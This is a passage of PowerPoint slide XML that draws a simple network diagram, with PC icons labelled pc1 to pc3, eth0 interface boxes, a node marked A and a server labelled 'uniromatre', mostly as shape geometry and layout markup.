          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{171C2D46-F67E-0837-46FA-06C3A32AEFEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3532746" y="1220690"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016833DC-BFD9-101F-2CD6-1CBAFC4914D2}"/>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52" y="1064"/>
              <a:ext cx="573"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 Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55A7DE0-100B-B136-6060-9D434B8CB038}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E64715-7D84-4866-3617-5A52E9785706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4474791" y="1228033"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E21FD8-6304-243A-8781-49C37F83DBC8}"/>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52" y="1064"/>
              <a:ext cx="573"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 Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF273C0D-428A-176D-D389-71D2C87D5A86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01242D0E-0136-0636-E77A-B28EC0236F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1518965" y="5559356"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB1146B8-731C-B225-CDA0-F5ED73C64877}"/>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52" y="1064"/>
              <a:ext cx="573"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Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0219749-6F64-E988-22D1-1157A4EF1C10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56233DFF-F677-2435-BA0E-CC9A8A21069B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3440447" y="2446573"/>
            <a:ext cx="3852857" cy="23324"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB45487B-D21D-D807-F03E-3D173E880CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7293304" y="2363536"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028E6805-6B4D-2CDD-D0A7-F12D88505405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657018" y="1972871"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E2EBF58-6664-00F2-DD21-6E4A88C9A61A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF92FD94-40CA-6605-CFEC-0980DCCDAEF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E904A6F0-DA6F-0B90-1AA5-D7E44D0EFA03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4597668" y="1958829"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2816ADB-3663-7BA0-220C-0AB272BFF378}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23BBB09F-2A1F-0236-F708-1AC3AE097AF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Gruppo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{981468B3-1362-1D2F-A41C-88C210D62E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5243610" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7727EBF-B646-34BB-AA42-94B88427DC41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2D1C5A-AEF3-057D-E851-A7B73EEB89EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B4384A-D7EC-1B49-F6FA-C9484237E306}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
